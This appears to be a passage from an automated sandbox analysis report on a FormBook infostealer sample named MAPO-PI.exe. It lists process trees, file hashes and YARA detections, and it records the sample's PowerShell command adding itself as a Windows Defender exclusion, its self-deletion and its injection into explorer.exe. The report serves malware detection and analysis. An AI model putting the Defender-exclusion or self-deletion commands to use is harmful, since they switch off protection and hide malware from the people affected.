                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Analysis Process: powershell.exe PID: 2592 Parent PID: 3868

                                General

                                Start time:07:40:05
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x80000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                Analysis Process: conhost.exe PID: 5196 Parent PID: 2592

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Analysis Process: MAPO-PI.exe PID: 5128 Parent PID: 3868

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\MAPO-PI.exe
                                Imagebase:0xeb0000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Analysis Process: explorer.exe PID: 3472 Parent PID: 5128

                                General

                                Start time:07:40:09
                                Start date:28/10/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Analysis Process: cmmon32.exe PID: 6928 Parent PID: 3472

                                General

                                Start time:07:40:31
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmmon32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                Imagebase:0x8b0000
                                File size:36864 bytes
                                MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                Analysis Process: cmd.exe PID: 980 Parent PID: 6928

                                General

                                Start time:07:40:35
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Analysis Process: conhost.exe PID: 6084 Parent PID: 980

                                General

                                Start time:07:40:36
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis

                                Reset < >